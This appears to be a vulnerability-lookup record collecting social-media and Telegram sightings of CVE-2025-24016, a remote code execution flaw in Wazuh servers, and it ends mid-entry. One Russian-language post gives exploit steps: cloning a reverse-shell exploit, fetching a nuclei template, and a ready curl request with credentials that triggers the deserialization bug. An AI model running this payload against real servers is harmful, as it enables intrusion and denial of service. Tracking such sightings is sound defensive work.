{"vulnerability": "CVE-2025-24016", "sightings": [{"uuid": "8b7c0099-6f81-4284-ae00-00f3998656a7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/13654", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aCVE-2025-24016\nURL\uff1ahttps://github.com/0xjessie21/CVE-2025-24016\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-02-16T11:04:36.000000Z"}, {"uuid": "1d904438-e7c3-42f1-8dec-99c82af2281e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/40005", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aCVE-2025-24016\nURL\uff1ahttps://github.com/B1ack4sh/Blackash-CVE-2025-24016\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-06-10T21:10:40.000000Z"}, {"uuid": "3ee35340-cfcc-425a-9017-da508bd317f9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/33441", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aRCE\n\u63cf\u8ff0\uff1aPatches the RCE Exploit in XWorm\nURL\uff1ahttps://github.com/cybersecplayground/CVE-2025-24016-Wazuh-Remote-Code-Execution-RCE-PoC\n\n\u6807\u7b7e\uff1a#RCE", "creation_timestamp": "2025-04-21T19:26:00.000000Z"}, {"uuid": "933bf30b-1d30-414d-bc98-dcba75acff27", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "published-proof-of-concept", "source": "https://t.me/TopCyberTechNews/437", "content": "Top Security News for Today\n\nJaguar Land Rover Breached by HELLCAT Ransomware Group Using Its Infostealer Playbook\u2014Then a Second Hacker Strikes  \nhttps://www.reddit.com/r/netsec/comments/1jd7t1f/jaguar_land_rover_breached_by_hellcat_ransomware/\n\nHistory of NULL Pointer Dereferences on macOS  \nhttps://www.reddit.com/r/netsec/comments/1jd7e2j/history_of_null_pointer_dereferences_on_macos/\n\nCVE-2025-24016: Unsafe Deserialization Vulnerability in Wazuh Leading to Remote Code Execution  \nhttps://www.reddit.com/r/netsec/comments/1jd9oed/cve202524016_unsafe_deserialization_vulnerability/\n\n[Tool] TruffleShow: A Client-Side Web Viewer for TruffleHog Outputs  \nhttps://www.reddit.com/r/netsec/comments/1jdcen1/tool_truffleshow_a_clientside_web_viewer_for/\n\n17th March \u2013 Threat Intelligence Report  \nhttps://research.checkpoint.com/2025/17th-march-threat-intelligence-report/\n\nImprovements in Brute Force Attacks  \nhttps://www.schneier.com/blog/archives/2025/03/improvements-in-brute-force-attacks.html\n\nStilachiRAT analysis: From system reconnaissance to cryptocurrency theft  \nhttps://www.microsoft.com/en-us/security/blog/2025/03/17/stilachirat-analysis-from-system-reconnaissance-to-cryptocurrency-theft/\n\nFollow Top Cyber News at https://t.me/TopCyberTechNews Feel free to DM me at https://twitter.com/ShayaFeedman", "creation_timestamp": "2025-03-18T09:30:24.000000Z"}, {"uuid": "f995495c-f090-45aa-97fa-df4cda49ca42", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "published-proof-of-concept", "source": "https://t.me/P0x3k_1N73LL1G3NC3/34", "content": "\u2699\ufe0f Wazuh \u2014 Unsafe Deserialization RCE (CVE-2025-24016)\n\nAn unsafe deserialization vulnerability in Wazuh servers allows remote code execution through unsanitized dictionary injection in DAPI requests/responses. If an attacker injects an unsanitized dictionary into a DAPI request or response, they can craft an unhandled exception, allowing arbitrary Python code execution.\n\n\ud83d\udd17 Source:\n https://github.com/0xjessie21/CVE-2025-24016\n\n#wazuh #deserialization #rce #cve", "creation_timestamp": "2025-02-18T10:46:04.000000Z"}, {"uuid": "ad50a3bb-e930-44a2-b781-f367edfc3057", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "published-proof-of-concept", "source": "https://t.me/ZeroEthical_Course/3694", "content": "\ud83d\udd2a Wazuh \u2014 Unsafe Deserialization RCE (CVE-2025-24016)\n\nAn unsafe deserialization vulnerability in Wazuh servers allows remote code execution through unsanitized dictionary injection in DAPI requests/responses. If an attacker injects an unsanitized dictionary into a DAPI request or response, they can craft an unhandled exception, allowing arbitrary Python code execution.\n\n\ud83d\udd17  Source: https://github.com/0xjessie21/CVE-2025-24016\n\n#wazuh #deserialization #rce #cve\n\ud83d\udd39 Share & Support Us \ud83d\udd39\n\ud83d\udcf1 Channel : @ZeroEthical_Course", "creation_timestamp": "2025-02-18T21:26:26.000000Z"}, {"uuid": "a1c75d73-72ac-489f-8474-587391689592", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "published-proof-of-concept", "source": "Telegram/67tsegYcQIUV7lyfyUyokIQvG0vHB8OXAelx-BGM_6cMQP8", "content": "", "creation_timestamp": "2025-04-22T05:00:08.000000Z"}, {"uuid": "1e2b8950-1191-4883-b170-ab8875834338", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "published-proof-of-concept", "source": "Telegram/KoImPbvq7TTeanbPRCUZjbRHe6kET-PXMoAHN1FRP5h8R3U", "content": "", "creation_timestamp": "2025-02-21T04:00:07.000000Z"}, {"uuid": "4cca34ed-3ca0-45b9-b71a-99b84d6cf7dc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://bsky.app/profile/sakaijjang.bsky.social/post/3lj42pracr22d", "content": "", "creation_timestamp": "2025-02-26T18:59:16.298975Z"}, {"uuid": "0f112eeb-97c8-480c-9650-a3b579d49a69", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://bsky.app/profile/vulnalerts.bsky.social/post/3lhumdc5ckm2r", "content": "", "creation_timestamp": "2025-02-11T02:27:55.885315Z"}, {"uuid": "e92f36fb-52b7-4fd0-9cc7-f24f8073bbb8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://bsky.app/profile/tmjintel.bsky.social/post/3lhyuzf7a3s27", "content": "", "creation_timestamp": "2025-02-12T19:14:06.651506Z"}, {"uuid": "4f64ec8b-5ad5-496c-896c-dcfa60602cb5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://bsky.app/profile/bontchev.infosec.exchange.ap.brid.gy/post/3lkn2pza2djj2", "content": "", "creation_timestamp": "2025-03-18T06:44:01.428575Z"}, {"uuid": "8ee36d6e-489c-46a2-9512-00ab08422ec8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3lreeiximkk26", "content": "", "creation_timestamp": "2025-06-11T21:37:17.917335Z"}, {"uuid": "e3d1b645-bc9b-474e-88a8-96822aa2ea22", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://bsky.app/profile/allaboutsecurity.bsky.social/post/3lrrzxvafhc24", "content": "", "creation_timestamp": "2025-06-17T08:06:06.536928Z"}, {"uuid": "c92837c6-c1d4-4497-9241-82f9d29cc26a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://bsky.app/profile/kitafox.bsky.social/post/3lrc77tsk7b2r", "content": "", "creation_timestamp": "2025-06-11T00:57:22.037291Z"}, {"uuid": "d26445ac-5d06-46c3-86c9-3330002c03b1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://bsky.app/profile/kitafox.bsky.social/post/3lrc7ipni4a2c", "content": "", "creation_timestamp": "2025-06-11T01:02:20.165815Z"}, {"uuid": "5212ce93-bdca-4f1c-b9af-8a677955ee74", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://bsky.app/profile/2rZiKKbOU3nTafniR2qMMSE0gwZ.activitypub.awakari.com.ap.brid.gy/post/3lr6nbcv7qc62", "content": "", "creation_timestamp": "2025-06-09T15:00:08.999584Z"}, {"uuid": "c67f2400-d235-4d53-99a2-ffdcd3644f1b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3lrowdtbahs2w", "content": "", "creation_timestamp": "2025-06-16T02:23:08.999207Z"}, {"uuid": "0a24f29b-5077-41d8-88a8-9ec1a2b537f0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://bsky.app/profile/leekthehack.bsky.social/post/3lrdq6o3dqc2e", "content": "", "creation_timestamp": "2025-06-11T15:33:42.951604Z"}, {"uuid": "b5348a58-3b06-4037-b59e-b1b07d89bac4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://bsky.app/profile/leekthehack.bsky.social/post/3lrdq6rqpls2e", "content": "", "creation_timestamp": "2025-06-11T15:33:43.588213Z"}, {"uuid": "ef288ce0-e9ee-48f5-8d58-298a5dadc0ab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://bsky.app/profile/nihonmatsu.bsky.social/post/3lra4li2dwc2a", "content": "", "creation_timestamp": "2025-06-10T05:04:52.155596Z"}, {"uuid": "d35a5b4e-ba12-4f72-b504-f94073eff6dc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3lrjgh77egk2g", "content": "", "creation_timestamp": "2025-06-13T21:55:29.956076Z"}, {"uuid": "a8c48ced-504e-45dd-8c6e-a9035567762d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://bsky.app/profile/cyberresearch.bsky.social/post/3ltr4egvsrh24", "content": "", "creation_timestamp": "2025-07-12T10:06:34.854880Z"}, {"uuid": "537794c0-9364-4fee-908e-38ce2b9347e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2025-09-29T03:12:16.000000Z"}, {"uuid": "2712b045-f714-4246-9432-c267360c4afc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://mastodon.social/users/leakix/statuses/115614941278580034", "content": "", "creation_timestamp": "2025-11-26T08:00:04.259540Z"}, {"uuid": "7a592dbb-ba35-418d-a1d2-2d88110eb3f1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://bsky.app/profile/leakix.bsky.social/post/3m6jf6csfgq2w", "content": "", "creation_timestamp": "2025-11-26T08:00:06.552126Z"}, {"uuid": "29eb5473-7b92-433c-90bb-5765061853cb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-08-22)", "content": "", "creation_timestamp": "2025-08-22T00:00:00.000000Z"}, {"uuid": "e648ce3b-43c2-48e5-bdfc-d18ca196c54c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://gist.github.com/alon710/ebc4c8f6e728f6343eba07aa950a7550", "content": "", "creation_timestamp": "2026-01-24T21:24:46.000000Z"}, {"uuid": "7a633df7-81ef-4009-924a-a412dc5f7428", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/14549", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aCVE-2025-24016: RCE in Wazuh server!  Remote Code Execution \nURL\uff1ahttps://github.com/MuhammadWaseem29/CVE-2025-24016\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-02-21T00:26:52.000000Z"}, {"uuid": "9d26a802-a404-4757-b58b-4466f0f371a7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "seen", "source": "https://t.me/cvedetector/17606", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2025-24016 - Wazuh DistributedAPI Remote Code Execution Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2025-24016 \nPublished : Feb. 10, 2025, 8:15 p.m. | 1\u00a0hour, 28\u00a0minutes ago \nDescription : Wazuh is a free and open source platform used for threat prevention, detection, and response. Starting in version 4.4.0 and prior to version 4.9.1, an unsafe deserialization vulnerability allows for remote code execution on Wazuh servers. DistributedAPI parameters are a serialized as JSON and deserialized using `as_wazuh_object` (in `framework/wazuh/core/cluster/common.py`). If an attacker manages to inject an unsanitized dictionary in DAPI request/response, they can forge an unhandled exception (`__unhandled_exc__`) to evaluate arbitrary python code. The vulnerability can be triggered by anybody with API access (compromised dashboard or Wazuh servers in the cluster) or, in certain configurations, even by a compromised agent. Version 4.9.1 contains a fix. \nSeverity: 9.9 | CRITICAL \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"10 Feb 2025\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2025-02-10T22:57:00.000000Z"}, {"uuid": "531c2c41-fd2d-47f2-8be5-6ded7d1b6df8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "published-proof-of-concept", "source": "Telegram/53wIaU0p9a171JLE0jZDDl-ZAg4u8Rv0M34YJ8GhWlpV87c", "content": "", "creation_timestamp": "2025-06-11T03:00:06.000000Z"}, {"uuid": "c9d2ef33-5050-4491-ad10-f864bdba72ae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/17937", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-24016\n\ud83d\udd25 CVSS Score: 9.9 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:H/A:H)\n\ud83d\udd39 Description: Wazuh is a free and open source platform used for threat prevention, detection, and response. Starting in version 4.4.0 and prior to version 4.9.1, an unsafe deserialization vulnerability allows for remote code execution on Wazuh servers. DistributedAPI parameters are a serialized as JSON and deserialized using `as_wazuh_object` (in `framework/wazuh/core/cluster/common.py`). If an attacker manages to inject an unsanitized dictionary in DAPI request/response, they can forge an unhandled exception (`__unhandled_exc__`) to evaluate arbitrary python code. The vulnerability can be triggered by anybody with API access (compromised dashboard or Wazuh servers in the cluster) or, in certain configurations, even by a compromised agent. Version 4.9.1 contains a fix.\n\ud83d\udccf Published: 2025-02-10T19:08:09.058Z\n\ud83d\udccf Modified: 2025-06-10T17:15:40.324Z\n\ud83d\udd17 References:\n1. https://github.com/wazuh/wazuh/security/advisories/GHSA-hcrc-79hj-m3qh", "creation_timestamp": "2025-06-10T17:32:27.000000Z"}, {"uuid": "4b21b2d5-bd74-4dd3-9548-ecf09a0cf4b1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/43945", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2025\n\u63cf\u8ff0\uff1aWazuh 8.4 CVE-2025-24016\nURL\uff1ahttps://github.com/guinea-offensive-security/Wazuh-RCE\n\n\u6807\u7b7e\uff1a#CVE-2025", "creation_timestamp": "2025-07-13T23:59:48.000000Z"}, {"uuid": "7a9f318d-9c11-40f3-aa6b-a83b94d1c28b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "published-proof-of-concept", "source": "https://t.me/poxek/4812", "content": "Wazuh RCE via Unsafe Deserialization CVE-2025-24016\n#CVE@poxek #wazuh #deserialization #RCE\n\n\u0412 Wazuh-\u0441\u0435\u0440\u0432\u0435\u0440\u0430\u0445 (\u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u044b\u0445 \u0434\u043b\u044f \u043f\u0440\u0435\u0434\u043e\u0442\u0432\u0440\u0430\u0449\u0435\u043d\u0438\u044f, \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u044f \u0438 \u0440\u0435\u0430\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u043d\u0430 \u0443\u0433\u0440\u043e\u0437\u044b) \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u0430\u044f \u0441 \u043d\u0435\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0439 \u0434\u0435\u0441\u0435\u0440\u0438\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0435\u0439 \u0434\u0430\u043d\u043d\u044b\u0445. \u041f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0432\u043e\u0437\u043d\u0438\u043a\u0430\u0435\u0442 \u0438\u0437-\u0437\u0430 \u0441\u043f\u043e\u0441\u043e\u0431\u0430 \u0441\u0435\u0440\u0438\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043e\u0432 DistributedAPI \u0432 \u0444\u043e\u0440\u043c\u0430\u0442\u0435 JSON \u0438 \u043f\u043e\u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u0439 \u0434\u0435\u0441\u0435\u0440\u0438\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438 \u0447\u0435\u0440\u0435\u0437 \u0444\u0443\u043d\u043a\u0446\u0438\u044e as_wazuh_object (\u0440\u0430\u0441\u043f\u043e\u043b\u043e\u0436\u0435\u043d\u043d\u0443\u044e \u0432 framework/wazuh/core/cluster/common.py). \u0415\u0441\u043b\u0438 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u0432\u043d\u0435\u0434\u0440\u0438\u0442 \u043d\u0435\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u044b\u0439 \u0441\u043b\u043e\u0432\u0430\u0440\u044c \u0432 \u0437\u0430\u043f\u0440\u043e\u0441 \u0438\u043b\u0438 \u043e\u0442\u0432\u0435\u0442 DAPI, \u044d\u0442\u043e \u043c\u043e\u0436\u0435\u0442 \u043f\u0440\u0438\u0432\u0435\u0441\u0442\u0438 \u043a \u0433\u0435\u043d\u0435\u0440\u0430\u0446\u0438\u0438 \u043d\u0435\u043e\u0431\u0440\u0430\u0431\u043e\u0442\u0430\u043d\u043d\u043e\u0433\u043e \u0438\u0441\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u044f (__unhandled_exc__) \u0438, \u043a\u0430\u043a \u0441\u043b\u0435\u0434\u0441\u0442\u0432\u0438\u0435, \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044e \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u043e\u0433\u043e Python-\u043a\u043e\u0434\u0430, \u0447\u0442\u043e \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0434\u0438\u0441\u0442\u0430\u043d\u0446\u0438\u043e\u043d\u043d\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043a\u043e\u0434 \u043d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440\u0435. \n\n\u27a1\ufe0f\u0423\u044f\u0437\u0432\u0438\u043c\u044b\u0435 \u0432\u0435\u0440\u0441\u0438\u0438\n\u041e\u0442 \u0432\u0435\u0440\u0441\u0438\u0438 4.4.0 \u0434\u043e \u0432\u0435\u0440\u0441\u0438\u0438 4.9.0 (\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0430 \u0432 \u0432\u0435\u0440\u0441\u0438\u0438 4.9.1)\n\nPoC 1. \u042d\u043a\u0441\u043f\u043b\u043e\u0439\u0442 \u043d\u0430 python3\ngit clone https://github.com/0xjessie21/CVE-2025-24016.git\ncd CVE-2025-24016/\npython3 -m venv venv; source venv/bin/activate\npip install -r requirements.txt\n\u0421\u043a\u0440\u0438\u043f\u0442 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0441\u0440\u0430\u0437\u0443 \u0441\u0434\u0435\u043b\u0430\u0442\u044c reverse shell python3 CVE-2025-24016.py -u  -i  -p \n\nPoC 2. \u0428\u0430\u0431\u043b\u043e\u043d \u0434\u043b\u044f nuclei\nwget https://raw.githubusercontent.com/huseyinstif/CVE-2025-24016-Nuclei-Template/refs/heads/main/CVE-2025-24016.yaml\n\u0422\u0430\u043c \u0435\u0441\u0442\u044c \u043f\u043e\u043c\u0435\u0442\u043a\u0430 \u0432 \u043a\u043e\u043c\u043c\u0435\u043d\u0442\u0430\u0445, \u0447\u0442\u043e \u0435\u0441\u043b\u0438 \u0435\u0441\u0442\u044c \u0430\u0432\u0442\u043e\u0440\u0438\u0437\u0430\u0446\u0438\u044f, \u0442\u043e \u0440\u0430\u0441\u043a\u043e\u043c\u043c\u0435\u043d\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0441\u0442\u0440\u043e\u043a\u0443\n\nPoC 3. \u0420\u0443\u0447\u043d\u0430\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f\ncurl -X POST -k -u \"wazuh-wui:MyS3cr37P450r.*-\" -H \"Content-Type: application/json\" --data '{\"unhandled_exc\":{\"class\": \"exit\", \"args\": []}}' https://:55000/security/user/authenticate/run_as\n\u042d\u0442\u043e\u0442 \u0437\u0430\u043f\u0440\u043e\u0441 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u0442 \u043d\u0435\u043a\u043e\u0440\u0440\u0435\u043a\u0442\u043d\u0443\u044e \u0434\u0435\u0441\u0435\u0440\u0438\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u044e \u0438 \u043f\u0440\u0438\u0432\u0435\u0434\u0451\u0442 \u043a \u0437\u0430\u0432\u0435\u0440\u0448\u0435\u043d\u0438\u044e \u0440\u0430\u0431\u043e\u0442\u044b \u043c\u0430\u0441\u0442\u0435\u0440-\u0441\u0435\u0440\u0432\u0435\u0440\u0430. \n\n\ud83d\udccc\u041f\u043e\u044f\u0441\u043d\u0435\u043d\u0438\u0435 \u043a \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043e\u0442 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u043e\u0432 Wazuh \u0422\u042b\u041a\n\n\u27a1\ufe0f\u0420\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0438\n\u25aa\ufe0f\u041e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u041f\u041e: \u041e\u0431\u044f\u0437\u0430\u0442\u0435\u043b\u044c\u043d\u043e \u043e\u0431\u043d\u043e\u0432\u0438\u0442\u0435 Wazuh \u0434\u043e \u0432\u0435\u0440\u0441\u0438\u0438 4.9.1 \u0438\u043b\u0438 \u0432\u044b\u0448\u0435, \u0433\u0434\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0430.\n\u25aa\ufe0f\u041e\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d\u0438\u0435 \u0434\u043e\u0441\u0442\u0443\u043f\u0430: \u041f\u0440\u043e\u0432\u0435\u0440\u044c\u0442\u0435 \u0438 \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u044c\u0442\u0435 \u0434\u043e\u0441\u0442\u0443\u043f \u043a API.\n\n\ud83c\udf1a @poxek | \ud83d\udcfa YT | \ud83d\udcfa RT | \ud83d\udcfa VK | \ud83c\udf1a \u041c\u0430\u0433\u0430\u0437\u0438\u043d \u043c\u0435\u0440\u0447\u0430", "creation_timestamp": "2025-02-18T10:47:13.000000Z"}, {"uuid": "6aaab983-4895-4b4d-aa23-3c7dcb7a82d0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "exploited", "source": "https://t.me/hackyourmom/11685", "content": "\ud83d\udc7e \u0423 Mirai \u043d\u043e\u0432\u0430 \u0446\u0456\u043b\u044c \u2014 \u0441\u0435\u0440\u0432\u0435\u0440\u0438 Wazuh. \u0414\u043e\u0441\u043b\u0456\u0434\u043d\u0438\u043a\u0438 \u0437 Akamai \u0432\u0438\u044f\u0432\u0438\u043b\u0438 \u0430\u043a\u0442\u0438\u0432\u043d\u0443 \u0435\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0456\u044e \u043a\u0440\u0438\u0442\u0438\u0447\u043d\u043e\u0457 \u0432\u0440\u0430\u0437\u043b\u0438\u0432\u043e\u0441\u0442\u0456 CVE-2025-24016, \u044f\u043a\u0430 \u0434\u043e\u0437\u0432\u043e\u043b\u044f\u0454 \u0432\u0438\u043a\u043e\u043d\u0443\u0432\u0430\u0442\u0438 